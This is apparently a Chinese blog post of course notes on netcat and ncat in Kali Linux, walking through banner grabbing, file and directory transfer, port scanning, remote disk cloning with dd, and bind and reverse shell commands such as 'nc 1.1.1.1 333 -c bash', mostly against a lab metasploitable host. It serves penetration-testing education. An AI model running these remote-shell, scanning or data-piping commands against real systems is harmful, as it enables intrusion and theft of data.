Kali Linux渗透测试 003 基本工具--NC

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. NETCAT – NC
2. NCAT

1. NETCAT – NC


  1. telnet / 获取banner信息

    #使用 nc 连接 163 邮箱
    root@kali:~# ping pop3.163.com
    root@kali:~# nc -vn 123.125.50.29 110
        (UNKNOWN) [123.125.50.29] 110 (pop3) open
        +OK Welcome to coremail Mail Pop3 Server (163coms[b62aaa251425b4be4eaec4ab4744cf47s])
    USER [email protected]
        -ERR źµŕʺƔފ±²»¿ʓn¿ʄܵŔ­Ӳˇ:źµŕʺŶൎ³¢˔´µŃ݂鬳䚰²ȫ¿¼Ç,ϒćʱО׆źµŕʺŵðop·Ďˈ¨О
        +OK core mail
        # 出现乱码,账号和密码需要 base64 编码
    
        root@kali:~# base64
        [email protected]【ctrl+d】
        dGVzdEAxNjMuY29tCg==
    
    root@kali:~# nc -vn 123.125.50.29 110
        (UNKNOWN) [123.125.50.29] 110 (pop3) open
        +OK Welcome to coremail Mail Pop3 Server (163coms[b62aaa251425b4be4eaec4ab4744cf47s])
    USER dGVzdEAxNjMuY29tCg==
        +OK core mail
    
    
    root@kali:~# nc -nv 192.168.1.110 25
    (UNKNOWN) [192.168.1.110] 25 (smtp) open
    220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
    
    
    root@kali:~# nc -nv 192.168.1.110 80
        (UNKNOWN) [192.168.1.110] 80 (http) open
    head /
    
  2. 传输文本信息

    A: root@kali:~# nc -l -p 4444
    B: root@metasploitable:~# nc -nv 192.168.1.100 4444
    # 可以传递输入的消息
    
    # 电子取证的时候要求被审计的目标尽可能少的被修改硬盘数据,可以使用 nc 进行传递消息
    A: root@kali:~# nc -l -p 4444
    B: root@metasploitable:~# ls -l | nc -nv 192.168.1.100 4444
    
    root@kali:~# nc -l -p 4444 > ps.txt
    root@metasploitable:~# ps aux | nc -nv 192.168.1.100 -q 1
    # -q 1 : 1秒之后断开连接
    
    A: root@kali:~# nc -l -p 4444 > lsof.txt
    B: root@metasploitable:~# lsof | nc -nv 192.168.1.100 4444 -q 1
    
  3. 传输文件/目录

    • 传输文件( B->A )
    A:root@kali:~# nc -lp 4444 > 2.mp4
    B:root@metasploitable:~# nc -nv 192.168.1.100 4444 < AWVS\ 01.avi -q 1
    或(A->B)
    A:root@kali:~# nc -q 1 -lp 4444 < 2.mp4 
    B:root@metasploitable:~# nc -nv 192.168.1.100 4444 > 3.mp4
    
    • 传输目录
    A:root@kali:~# tar zcvf - testdir/ | nc -lp 4444 -q 1
    B:root@metasploitable:~# nc 192.168.1.100 4444 | tar zxvf -
    
  4. 加密传输文件

    • 加密传文件
    A:root@kali:~# nc -lp 4444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
    B:root@metasploitable:~# mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 192.168.1.100 333 -q 1
    
  5. 流媒体服务器

    A: root@metasploitable:~# cat 3.mp4 | nc -lp 333
    B: root@kali:~# nc -nv 192.168.1.110 | mplayer -vo x11 -cache 3000 -
    
  6. 端口扫描

    root@kali:~# nc -nvz 192.168.1.110 1-65535
    root@kali:~# nc -nvz 192.168.1.110 1-1024
    
  7. 远程控制/木马

    • 正向:(B->A)
    • A:root@kali:~# nc -lp 333 -c bash
    • B:root@metasploitable:~# nc -nv 192.168.1.100 333
    • 反向:(A->B)
    • A:nc -lp 333
    • B:nc 1.1.1.1 333 -c bash
    • 注:Windows用户把bash改成cmd;
    
  8. 远程克隆硬盘

    • A: root@kali:~# nc -lp 4444 | dd of=/dev/sda
    • B: root@metasploitable:~# dd if=/dev/sda | nc -nv 192.168.1.100 4444 -q 1
    • 远程电⼦子取证,可以将目标服务器硬盘远程复制,或者内存。
    

2. NCAT


  1. Nc缺乏加密和⾝身份验证的能力
  2. Ncat包含于nmap⼯工具包中

    #allow:允许访问的主机
    A:root@kali:~# ncat -c bash --allow 192.168.1.110 -vnl 333 --ssl
    B:root@metasploitable:~# ncat -nv 192.168.1.100 333 --ssl
    

你可能感兴趣的:(kali-linux)